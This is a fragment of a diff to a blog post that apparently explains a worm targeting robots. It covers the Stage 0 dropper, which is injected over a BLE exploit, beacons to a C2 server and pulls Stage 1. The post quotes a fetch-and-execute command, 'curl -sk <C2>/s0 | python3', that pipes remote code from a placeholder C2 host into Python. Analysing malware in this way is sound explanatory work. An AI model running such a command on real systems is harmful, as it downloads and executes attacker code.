a-bissell/app13.info/_posts/2026-06-12-anatomy-of-a-robot-worm.md

 Roughly 500 bytes of Python.
 Injected via `curl -sk <C2>/s0 | python3` through the BLE exploit.

 It does three things: generates a unique robot ID from the hostname and MAC address, sends a beacon to the C2 server (`POST /beacon`) so the robot immediately appears in the operator's dashboard, and downloads Stage 1.
 That's it.
-Small on purpose — the BLE characteristic has limited payload space, so the dropper's only job is to establish contact and pull the next stage.
+Small on purpose since the BLE characteristic has limited payload space.
+The dropper's only job is to establish contact and pull the next stage.

 ### Stage 1: The Downloader